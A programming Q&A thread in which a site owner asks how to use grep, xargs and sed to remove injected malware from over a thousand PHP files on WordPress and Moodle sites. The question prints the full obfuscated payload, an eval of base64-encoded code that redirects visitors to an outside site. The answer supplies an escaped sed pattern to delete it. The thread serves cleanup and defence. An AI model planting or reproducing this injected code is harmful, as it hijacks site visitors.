# How to use Grep, Xargs, & Sed to replace code in text file

Tags: bash, search, sed, replace, grep

Several of my WP sites and Moodle were hit by some malicious logic that redirects users to a robot-xyz site on first visit.  I looked at the PHP code and found this (if you decode the 64-bit encoding it shows the source code of the malicious logic).  In any case, I need to do some surgery on over a thousand text files (.php files).  I need to delete the following code from each text file recursively.

```
/*aeR4Choc_start*/@eval(base64_decode('aWYoIWRlZmluZWQoImNoYWVKb3U3IikpewogICAgZGVmaW5lKCJjaGFlSm91NyIsIDEpOwogICAgZnVuY3Rpb24gaXNNb2JpbGUoJHVhZ2VudFN0cil7CiAgICAgICAgaWYoc3RycG9zKCR1YWdlbnRTdHIsICdhbmRyb2lkJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnYmxhY2tiZXJyeScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2lwaG9uZScpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2lwYWQnKSAhPT0gZmFsc2UKICAgICAgICAgICAgfHwgc3RycG9zKCR1YWdlbnRTdHIsICdpcG9kJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnb3BlcmEgbWluaScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2llTW9iaWxlJykgIT09IGZhbHNlKXsKICAgICAgICAgICAgcmV0dXJuIHRydWU7CiAgICAgICAgfQogICAgICAgIHJldHVybiBmYWxzZTsKICAgIH0KCiAgICBmdW5jdGlvbiBpc0Rlc2t0b3AoJHVhZ2VudFN0cil7CiAgICAgICAgaWYoc3RycG9zKCR1YWdlbnRTdHIsICdlZGdlJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnbXNpZScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ29wcicpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2Nocm9taXVtJykgIT09IGZhbHNlCiAgICAgICAgICAgIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnZmlyZWZveCcpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2Nocm9tZScpICE9PSBmYWxzZSl7CiAgICAgICAgICAgIHJldHVybiB0cnVlOwogICAgICAgIH0KICAgICAgICByZXR1cm4gZmFsc2U7CiAgICB9CgogICAgJHJlZGlyVG8gPSAiaHR0cHM6Ly9jaGVjay1yb2JvdC54eXovIjsKICAgICRjaGVja0Nvb2tSZWRpclN0ciA9ICJhZU5lZThwaSI7CiAgICAkcmVkaXJlY3RBbGxvdyA9IHRydWU7CiAgICBmb3JlYWNoICgkX0NPT0tJRSBhcyAkY29va0tleT0+JGNvb2tWYWwpewogICAgICAgIGlmIChzdHJwb3MoJGNvb2tLZXksICd3b3JkcHJlc3NfbG9nZ2VkX2luJykgIT09IGZhbHNlIHx8ICRjb29rS2V5ID09ICRjaGVja0Nvb2tSZWRpclN0cikgewogICAgICAgICAgICAkcmVkaXJlY3RBbGxvdyA9IGZhbHNlOwogICAgICAgICAgICBicmVhazsKICAgICAgICB9CiAgICB9CgogICAgJHVhZ2VudCA9IHN0cnRvbG93ZXIoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKTsKCiAgICBpZiAoJHJlZGlyZWN0QWxsb3cpewogICAgICAgIGlmKGlzTW9iaWxlKCR1YWdlbnQpIHx8IGlzRGVza3RvcCgkdWFnZW50KSkgewogICAgICAgICAgICBzZXRjb29raWUoJGNoZWNrQ29va1JlZGlyU3RyLCAiMSIsIHRpbWUoKSArIDYwNDgwMCk7CiAgICAgICAgICAgIGhlYWRlcigiTG9jYXRpb246ICRyZWRpclRvIik7CiAgICAgICAgICAgIGRpZTsKICAgICAgICB9CiAgICB9Cn0='));/*aeR4Choc_end*/
```

The code isn't always on its own line in the text file... sometimes it's part of an existing code line.  So I need to do a character by character level delete.

I've found some other posts on here doing similar things but something is not working perhaps because the code I want to remove might include escape characters (?) or simply be too long (?).

The post that helped me said:

> grep -rl matchstring somedir/ | xargs sed -i ’s/string1/string2/g’
>   Replace backslash / by pipe | in the sed command, e.g.:
>
> grep -rl matchstring somedir/ | xargs sed -i 's|string1|string2|g'
>
> Working for strings containing backslash, for example: html,
>   javascript, url etc.

and my CLI (that doesn't work) is...

```
grep -lr "*aeR4Choc_start*" "/home/me/public_html/mysite.org/" | xargs sed -i 's|/*aeR4Choc_start*/@eval(base64_decode('aWYoIWRlZmluZWQoImNoYWVKb3U3IikpewogICAgZGVmaW5lKCJjaGFlSm91NyIsIDEpOwogICAgZnVuY3Rpb24gaXNNb2JpbGUoJHVhZ2VudFN0cil7CiAgICAgICAgaWYoc3RycG9zKCR1YWdlbnRTdHIsICdhbmRyb2lkJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnYmxhY2tiZXJyeScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2lwaG9uZScpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2lwYWQnKSAhPT0gZmFsc2UKICAgICAgICAgICAgfHwgc3RycG9zKCR1YWdlbnRTdHIsICdpcG9kJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnb3BlcmEgbWluaScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2llTW9iaWxlJykgIT09IGZhbHNlKXsKICAgICAgICAgICAgcmV0dXJuIHRydWU7CiAgICAgICAgfQogICAgICAgIHJldHVybiBmYWxzZTsKICAgIH0KCiAgICBmdW5jdGlvbiBpc0Rlc2t0b3AoJHVhZ2VudFN0cil7CiAgICAgICAgaWYoc3RycG9zKCR1YWdlbnRTdHIsICdlZGdlJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnbXNpZScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ29wcicpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2Nocm9taXVtJykgIT09IGZhbHNlCiAgICAgICAgICAgIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnZmlyZWZveCcpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2Nocm9tZScpICE9PSBmYWxzZSl7CiAgICAgICAgICAgIHJldHVybiB0cnVlOwogICAgICAgIH0KICAgICAgICByZXR1cm4gZmFsc2U7CiAgICB9CgogICAgJHJlZGlyVG8gPSAiaHR0cHM6Ly9jaGVjay1yb2JvdC54eXovIjsKICAgICRjaGVja0Nvb2tSZWRpclN0ciA9ICJhZU5lZThwaSI7CiAgICAkcmVkaXJlY3RBbGxvdyA9IHRydWU7CiAgICBmb3JlYWNoICgkX0NPT0tJRSBhcyAkY29va0tleT0+JGNvb2tWYWwpewogICAgICAgIGlmIChzdHJwb3MoJGNvb2tLZXksICd3b3JkcHJlc3NfbG9nZ2VkX2luJykgIT09IGZhbHNlIHx8ICRjb29rS2V5ID09ICRjaGVja0Nvb2tSZWRpclN0cikgewogICAgICAgICAgICAkcmVkaXJlY3RBbGxvdyA9IGZhbHNlOwogICAgICAgICAgICBicmVhazsKICAgICAgICB9CiAgICB9CgogICAgJHVhZ2VudCA9IHN0cnRvbG93ZXIoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKTsKCiAgICBpZiAoJHJlZGlyZWN0QWxsb3cpewogICAgICAgIGlmKGlzTW9iaWxlKCR1YWdlbnQpIHx8IGlzRGVza3RvcCgkdWFnZW50KSkgewogICAgICAgICAgICBzZXRjb29raWUoJGNoZWNrQ29va1JlZGlyU3RyLCAiMSIsIHRpbWUoKSArIDYwNDgwMCk7CiAgICAgICAgICAgIGhlYWRlcigiTG9jYXRpb246ICRyZWRpclRvIik7CiAgICAgICAgICAgIGRpZTsKICAgICAgICB9CiAgICB9Cn0='));/*aeR4Choc_end*/||g'
```

I'm running CentOS.  What am I doing wrong that I can't delete this long string from text files?

Comment: Just redeploy all the sites. You do have a deployment process, right?

Comment: I think you might have to provide at least a fragment of your php file that doesn't work...

Comment: Also, /*aeR4Choc_start*/ in your sed pattern will match zero or more slashes (/) followed by aeR4Chock_star followed by zero or more 't' s then a slash (/).   I don't think that is what you mean, so you need to escape the splat (*) to get the match you want.

Answer (score 0):

Try this:

```
grep -Flr '/*aeR4Choc_start*/' /home/me/public_html/mysite.org/ |
  xargs sed -i "s|/\*aeR4Choc_start\*/@eval(base64_decode('[a-zA-Z0-9+/]*='));/\*aeR4Choc_end\*/||g"
```

Use `-F` to search for a a fixed string, not a regex.

In `sed`, use `|` as separator, escape all `*`'s to `\*` and use `[a-zA-Z0-9+/]*` to match the base64 encoded string.

Make a backup of your site before you run this command.